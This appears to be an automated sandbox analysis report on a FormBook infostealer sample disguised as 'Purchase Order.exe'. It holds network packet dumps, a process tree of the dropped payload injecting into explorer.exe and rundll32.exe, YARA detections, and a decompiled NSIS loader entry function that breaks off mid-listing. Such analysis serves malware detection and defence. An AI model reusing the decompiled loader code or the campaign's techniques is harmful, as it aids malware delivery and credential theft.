ad e4 3a 7a f7 6f 2f be 85 ff 67 11 8f 97 b3 81 88 ed df 7e 19 e0 43 c1 03 f8 ff b5 90 9c f9 2b 9e e5 42 ce 06 bf fd fa 93 7d 8b ef f1 79 cc d7 62 36 b8 0b c5 7d 9a 64 72 c0 fc 24 96 22 96 b3 c1 7d 18 c8 d5 2c 10 77 a1 2f 6c fc 61 b1 30 0e 65 c8 23 3b f7 79 24 66 63 84 12 85 f1 67 96 89 68 36 48 b3 64 11 46 62 c0 56 99 58 cc 06 2b 29 d3 dc 3b 3f 5f ae d3 a5 93 64 cb f3 87 45 7c 3e c6 4e ff f6 e2 5b 19 ca 48 bc fb 4f be 14 2c 4e 24 5b 24 9b 38 60 7f b0 bf f1 88 3f 72 f6 73 78 27 be 3d a7 36 6a 02 88 e8 eb 2c 99 27 32 7f 5d a0 f9 7a cd 1f ec 70 cd 97 c2 4e 33 01 d3 f0 22 9e 2d c5 6b 76 fe ee c5 b7 05 6e af 83 38 87 06 0b 21 fd d5 6b 42 f0 f5 f9 f9 1a 47 73 a2 f0 ae 67 87 dc b9 87 a9 f4 83 7e 1f 06 4b 21 73 e7 3e 75 fc 64 dd af 4f ee 1e d5 dc 75 96 19 bf e3 92 67 fd 87 18 9f d0 67 b2 af cf 80 47 52 64 31 97 62 c0 e4 63 2a 66 03 9e a6 51 e8 73 19 26 f1 79 96 e7 df 3c ac a3 01 c3 d5 9c 0d 8c 15 66 af 32 fe df 9b 64 ca 7e 12 22 a8 b3 8d b1 36 e7 0b 21 82 f3 41 75 49 9f 3e ea f7 c9 7a 2d 62 99 1f 1c de 57 0d 4d 3c 72 3f 0b 53 f9 ee c5 7d 18 07 c9 bd f3 e9 3e 15 eb e4 f7 f0 17 21 65 18 2f 73 36 63 db c1 9c e7 e2 b7 2c 1a 78 6a 2f 7c 38 ff 70 ae 38 e8 c3 39 32 6d fe e1 dc 4f 32 f1 e1 1c 3b 7f 38 1f 5f 3a ae e3 7e 38 bf 99 3c dc 4c 3e 9c 0f ac 81 78 90 03 6f e0 a4 f1 72 60 0d f2 bb e5 69 f0 f2 bb 25 42 cb ef 96 3f 12 c0 fc 0e 01 26 9b cc 17 03 6f 3b f0 93 d8 e7 12 d1 50 f8 7a 80 ae b1 0a 1f ce ef 53 3b 8c fd 68 13 88 fc c3 f9 ef 39 3e c0 1e 76 26 22 c1 73 e1 ac c3 d8 f9 3d ff cb 9d c8 66 d7 8e eb 5c 0c 76 bb e9 8b f3 37 2f d9 af ab 30 67 20 1d 58 98 33 be 91 89 bd 14 b1 c8 b8 14 01 7b 73 fe e2 e5 62 13 fb c0 2e 43 61 71 4b 8e b6 77 3c 63 b1 95 59 89 15 ce b8 e3 67 82 4b f1 63 24 60 bd 86 03 9f c7 77 3c 1f 8c ac 74 16 3a 4b 21 bf 07 99 f5 20 5f bd 32 7f 0d 07 93 60 30 9a 6a c0 2c 1f 0a 0d 98 cf 7e 91 59 18 2f 9d 45 96 ac bf 5f f1 ec fb 24 10 96 98 0d 53 c7 8f 04 cf fe 21 7c 39 74 2d d7 0a 1d 12 7c a1 b3 12 e1 72 25 47 56 ea 2c c2 28 fa 55 3c c8 21 77 80 cd 1f 87 72 15 e6 96 18 59 ae e5 8e ac d0 91 c9 0f 5c f2 df fe f1 f3 70 34 9a 66 42 6e b2 98 9d 0e 57 2a b8 62 36 9b 55 60 ef 8a 89 f9 43 41 f4 92 4d 4a 11 97 0e 46 53 e9 e4 99 3f 13 96 74 02 b1 10 d9 4c 3a b4 53 81 6e e7 bf Data Ascii: 260a}k8qXcKnEZ~mDtwDB%zZ}#3\|IS"D"2o_:zo/g~C+B}yb6}dr$"},w/la0e#;y$fcgh6HdFbVX+);?_dE\|>N[HO,N$[$8`?rsx'=6j,'2]zpN3"-kvn8!kBGsg~K!s>udOuggGRd1bcfQs&y<f2d~"6!AuI>z-bWM<r?S}>!e/s6c,xj/\|8p892mO2;8_:~8<L>xor`i%B?&o;PzS;h9>v&"s=f\v7/0g X3{sb.CaqKw<cYgKc$`w<t:K! _2`0j,~Y/E_$S!\|9t-\|r%GV,(U<!wrY\p4fBnWb6U`CAMJFS?tL:Sn
Oct 24, 2022 11:07:23.522746086 CEST	370	IN	Data Raw: f3 3b ae 5a 5a 1c 08 aa 28 9d 7f f7 f8 2b 5f fe 07 5f 8b e1 60 25 78 30 18 bd 77 3f c2 ac 45 1c 7c bf 0a a3 60 28 47 bb 45 92 0d 93 d9 5f b3 8c 3f 0e 07 8b 88 03 5b 11 1b 8d 2c e9 e4 9b 14 f4 4a 3e db 8a 3b 91 3d ca 55 18 2f bd 97 ae 55 fe fa f1 Data Ascii: ;ZZ(+__`%x0w?E\|`(GE_?[,J>;=U/U)\|ge3w}8r5fTBy>~e/_}(0u`\Da,fXI<Xby.h&Z\|~<y{{c]_o{e}{E?Z_^uu};o?Z
Oct 24, 2022 11:07:23.522770882 CEST	372	IN	Data Raw: b8 68 1d f5 a2 d1 e7 c2 e8 33 a9 ae ca b8 85 5c ab cb 06 84 4b 13 42 75 d4 71 73 5d 77 ab ab 06 84 2b 03 c2 f8 b6 b2 64 63 67 42 f4 ba 6e f4 ba 36 7b d5 30 a7 a5 85 cd 96 87 f1 32 12 76 9a e4 92 99 0b 64 39 29 04 bd ea 1c d3 4a 36 cf a3 7d 1c 26 Data Ascii: h3\KBuqs]w+dcgBn6{02vd9)J6}&^GIrqd[m+kZj[~`pJd0-@x,C)Z8hj'IYK{X0j}<,h\71T]iil2Yp
Oct 24, 2022 11:07:23.522794008 CEST	373	IN	Data Raw: 96 77 a0 a5 7b 36 86 5a a1 82 ac 91 0c 02 bb fb e1 69 0b d6 08 a7 75 a3 0d 94 55 76 e5 3c 79 30 ac f2 fd 51 96 ab d1 54 09 31 c5 57 e3 f4 81 e5 49 14 06 ac dc 37 a6 98 03 1d d3 b5 8a 8a 00 b9 da 07 3a 22 3e 11 6b 06 ff 73 e1 bf aa 3b 4a c7 f9 26 Data Ascii: w{6ZiuUv<y0QT1WI7:">ks;J&Il9DpzE4UDr8^e6P6T{S8bd)[AmU)1X!3v?5!@[j(K2`4@}/3 g<QOANmb]l
Oct 24, 2022 11:07:23.522813082 CEST	374	IN	Data Raw: 35 c3 f3 67 57 97 f3 6b ff 62 6a 7a de 58 a0 e9 e1 f1 f8 9e 63 6e 8a 63 52 70 57 47 b3 cd 45 6e 89 ef d1 32 ea 17 d4 15 4d 47 cc 58 c6 d4 59 95 76 4c ac d0 92 d6 ab 47 3a 9c b8 bb 2b 33 36 b5 20 ae 64 ea 92 47 db 96 b2 69 c6 84 c0 11 de b5 a5 70 Data Ascii: 5gWkbjzXcncRpWGEn2MGXYvLG:+36 dGipH";!iui`?UXVBp{@Ar}aa2,[8_s/J<:jWi?VQSRpg^l^%GEcm'A(stm36W'$RU]v>08a6f9gr
Oct 24, 2022 11:07:23.522840023 CEST	376	IN	Data Raw: f0 d3 27 bd 25 b4 e5 8c 77 21 31 97 dd 96 a9 e5 ba 49 39 ab 12 2a b2 17 fd 4c 62 b8 1d 87 6a ef 8e 18 ec f6 cf 70 fb 52 af 29 d4 c5 60 1b 42 6d 33 da 3b 17 f4 2d 70 b5 df fb 11 cf f3 37 b3 41 29 69 29 30 31 f8 38 32 26 84 1d 3e 7d 0a 63 b8 e2 07 Data Ascii: '%w!1I9LbjpR)`Bm3;-p7A)i)0182&>}chuxv=_,'8$ \O\0H(Ut*4C$P(cN?@>Bo[AAE9dKofP3_v:f1;br1\|z127c@3,>
Oct 24, 2022 11:07:23.522866011 CEST	377	IN	Data Raw: 80 d7 8a 52 50 04 0b 2b 8b eb cd 3b fc 72 68 df 5d b9 0c 4e ae ce c0 c4 ab 0e b3 e4 be 8c 35 12 eb aa 4b 14 8b d7 92 cf 23 21 ed 0b 1b cf 89 b3 e4 9e ca 3d eb 60 e0 40 c7 3c 14 56 bc 5c 87 56 44 ec 0f 0c 06 8b b6 7f ac 32 10 b5 55 b7 36 62 90 6a Data Ascii: RP+;rh]N5K#!=`@<V\VD2U6bj=.LmSNVB`jV~W#_rR}]J)fIluJ\y/\n_YVU}E$;[rKL_`%NdRV
Oct 24, 2022 11:07:23.522911072 CEST	378	IN	Data Raw: d1 be 36 a4 0e 1c a8 65 69 99 5a 79 bc 74 60 a8 37 46 4a 74 39 8a 0a 50 60 a1 72 f7 c4 10 cd fa 15 bb f8 50 e9 7d 7a 47 75 e8 7b f1 38 0a 52 51 74 84 5b be 62 0c d5 49 59 d1 18 73 9e d9 c6 86 a3 31 0f b3 6f 79 7d 5e b9 6f d4 36 31 18 b9 e5 fb aa Data Ascii: 6eiZyt`7FJt9P`rP}zGu{8RQt[bIYs1oy}^o61Ay~&1`\LIdy3o'qQhK$a=m(2\3SC.Sf?5~:#Nd$.-?=_r,O9M}l0
Oct 24, 2022 11:07:23.522938013 CEST	379	IN	Data Raw: 38 35 34 0d 0a b4 5d db 92 a3 36 10 7d df af 20 35 95 f2 38 11 36 12 17 e3 d9 cc e6 5b b8 68 3c 64 b1 4d 81 3d b3 ce 56 fe 3d d5 ba 00 c2 c2 88 cb 3e cc c3 c8 d2 39 4d 4b 48 47 d0 a8 ff 82 d9 0c 1e be bd ae 58 49 f5 4e e9 65 65 65 e9 eb aa fe e8 Data Ascii: 854]6} 586[h<dM=V=>9MKHGXINeee72*ovRU+z/r)^cGhgtY))IUml'&?hlH(W-z+s0v>{G}'Bfjl[Cv5MoEIjvr.)sFm
Oct 24, 2022 11:07:23.522964001 CEST	380	IN	Data Raw: 56 ad 3c 2a 41 e4 bb c1 23 a8 1f b6 a8 e6 c1 b1 55 ff f1 04 ed 96 8c 42 76 be 5a ac 48 6c 8e d8 de 09 36 45 e7 e4 bb 7d 88 8a 17 8b 78 ec 4c 97 cf c2 e6 5f ea c3 2f 15 84 97 b0 07 ce 10 58 63 fd b4 f8 e7 bd 16 0b b3 11 d0 32 9c 0f 3e ee b2 58 86 Data Ascii: V<A#UBvZHl6E}xL_/Xc2>X]{,AJqgQC>NcV"(4&aUCXqU)eZ?!Z_ym\|7)~D,A%;}52z'lS`]^IE,zmoh
Oct 24, 2022 11:07:23.696149111 CEST	382	IN	Data Raw: 64 64 66 0d 0a ec 5d 4b 8f 1b b9 11 be e7 57 34 ec cb 7a 77 a8 e8 35 f6 8e 06 6b 24 59 20 d8 00 79 00 31 f6 b4 c8 81 52 53 12 e1 56 53 61 53 f3 80 e1 ff 1e 54 f1 21 76 93 ec 6e f5 68 66 b4 81 7d f2 b4 c8 e2 47 56 b1 58 55 24 8b 2d 57 12 97 7b 42 Data Ascii: ddf]KW4zw5k$Y y1RSVSaST!vnhf}GVXU$-W{BsHiv-t;FOfSACT_r7V+8R4EUx^t<Az>^\|l4M;x}z/$B}f:ysU<U.EPfRe/

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Purchase Order.exePID: 1380, Parent PID: 3320

General

Target ID:	0
Start time:	11:05:04
Start date:	24/10/2022
Path:	C:\Users\user\Desktop\Purchase Order.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Purchase Order.exe
Imagebase:	0x400000
File size:	264302 bytes
MD5 hash:	B0FCEC089AD6578E526554A0865B5BFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: sphybwtjm.exePID: 4444, Parent PID: 1380

General

Target ID:	1
Start time:	11:05:05
Start date:	24/10/2022
Path:	C:\Users\user\AppData\Local\Temp\sphybwtjm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe
Imagebase:	0xa30000
File size:	59904 bytes
MD5 hash:	E9A4818AC7164F4FF1B2ABFD99B75F6C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 69%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: sphybwtjm.exePID: 3760, Parent PID: 4444

General

Target ID:	2
Start time:	11:05:06
Start date:	24/10/2022
Path:	C:\Users\user\AppData\Local\Temp\sphybwtjm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe
Imagebase:	0xa30000
File size:	59904 bytes
MD5 hash:	E9A4818AC7164F4FF1B2ABFD99B75F6C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3320, Parent PID: 3760

General

Target ID:	5
Start time:	11:05:10
Start date:	24/10/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff75ed40000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 5656, Parent PID: 4444

General

Target ID:	6
Start time:	11:05:10
Start date:	24/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 492
Imagebase:	0x310000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5008, Parent PID: 3320

General

Target ID:	16
Start time:	11:05:48
Start date:	24/10/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe
Imagebase:	0x910000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Purchase Order.exePID: 1380, Parent PID: 3320COMMON

Execution Graph

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.6%
Total number of Nodes:	1339
Total number of Limit Nodes:	18

Executed Functions

Function 0040352D Relevance: 89.7, APIs: 34, Strings: 17, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t179 = E0040690A(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E0040689A(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t188,  &_v1016, 0x2b4, _t188); // executed
				E0040653D(0x433f00, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\frontdesk\\Desktop\\Purchase Order.exe\"";
				E0040653D(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x434f00 = 0x400000;
				_t250 = L"\"C:\\Users\\frontdesk\\Desktop\\Purchase Order.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00440002;
				}
				_t198 = CharNextW(E00405E39(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405E39(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E0040653D(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E004034FC(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x434f94 == _t188) {
														L77:
														_t119 =  *0x434fac;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E0040690A(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t188) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t264);
												goto L68;
											}
											_t218 = E00405E39(L"\"C:\\Users\\frontdesk\\Desktop\\Purchase Order.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\frontdesk\\Desktop\\Purchase Order.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\frontdesk\\Desktop\\Purchase Order.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\frontdesk\\Desktop\\Purchase Order.exe\"") {
													_t189 = E00405B08(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\frontdesk\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\frontdesk\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040653D(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t219);
														}
														E0040653D(0x436000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x436800 = _t143;
														do {
															E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\frontdesk\\Desktop\\Purchase Order.exe", 0x42aa28, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E004062FD(_t201, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t152 = E00405B20(0x42aa28);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E00405F14(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E0040653D(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t221);
												E0040653D(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\frontdesk\\Desktop\\Purchase Order.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E004034FC(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E004034FC(_t198, _t253);
